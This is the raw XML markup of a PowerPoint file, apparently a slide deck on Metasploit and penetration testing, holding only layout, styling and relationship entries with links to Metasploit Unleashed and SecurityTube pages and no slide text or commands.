            <a:ext cy="1046400" cx="77724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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="3000" i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Shape 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2111123" x="685800"/>
            <a:ext cy="1546500" cx="77724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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="48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0" name="Shape 1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1" name="Shape 11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13" name="Shape 1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" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="39945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/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1600200" x="4692273"/>
            <a:ext cy="4967700" cx="39945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17" name="Shape 1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19" name="Shape 1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0" name="Shape 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5875078" x="457200"/>
            <a:ext cy="692700" cx="8229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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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21" name="Shape 21"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx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Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="../slideLayouts/slideLayout4.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId4"/><Relationship Target="../slideLayouts/slideLayout3.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId3"/><Relationship Target="../slideLayouts/slideLayout6.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId6"/><Relationship Target="../slideLayouts/slideLayout5.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId5"/><Relationship Target="../theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId7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4" name="Shape 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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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trike="noStrike" u="none" b="1" cap="none" baseline="0" sz="36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algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="30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480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="24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480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
              <a:defRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="24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●"/>
              <a:defRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="18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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="18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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="18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●"/>
              <a:defRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="18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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="18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trike="noStrike" u="none" b="0" cap="none" baseline="0" sz="180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2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" tx2="lt2" tx1="dk1" bg2="dk2" bg1="lt1" folHlink="folHlink" accent1="accent1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sldNum="0" hdr="0"/>
  <p:txStyles>
    <p:title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Target="../notesSlides/notesSlide1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2.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image11.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide11.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image05.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide12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13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide13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14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide14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15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide15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16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide16.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Architecture" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image05.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide17.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide18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7.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide19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17.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide2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20.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide20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21.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide21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6.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide22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6.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide23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24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide24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13.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image14.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide25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16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide26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26.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide27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28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide28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22.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide29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18.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide3.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="http://www.offensive-security.com/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide30.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide30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18.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide31.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide31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40.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide32.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide32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37.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide33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19.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide34.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide34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20.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide35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36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide36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30.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide37.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide38.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide38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21.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide39.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide39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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide4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4.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide40.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide40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41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide41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23.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide42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24.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide43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25.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide44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28.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide45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46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide46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29.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide47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33.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide48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31.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide49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27.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide5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50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide50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51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide51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35.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image32.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide52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53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide53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54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide54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55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide55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34.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide56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57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide57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39.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide58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36.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide59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6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide6.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Id="rId2"/><Relationship Target="../slideLayouts/slideLayout2.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Id="rId1"/><Relationship Target="http://www.offensive-security.com/metasploit-unleashed/Main_Page" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="../media/image08.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/><Relationship Target="../media/image00.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId6"/><Relationship Target="http://www.securitytube.net/groups?operation=view&amp;groupId=10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide60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47.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide61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62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide62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63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide63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64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide64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65.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide65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66.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide66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55.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide67.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide67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56.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide68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69.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide69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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide7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1.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="http://www.youtube.com/watch?v=u8qgehH3kEQ" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="../media/image15.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId6"/><Relationship Target="../media/image10.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide70.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide70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71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide71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72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide72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38.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide73.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide73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74.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide74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75.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide75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42.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide76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43.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide77.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide77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41.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide78.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide78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44.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

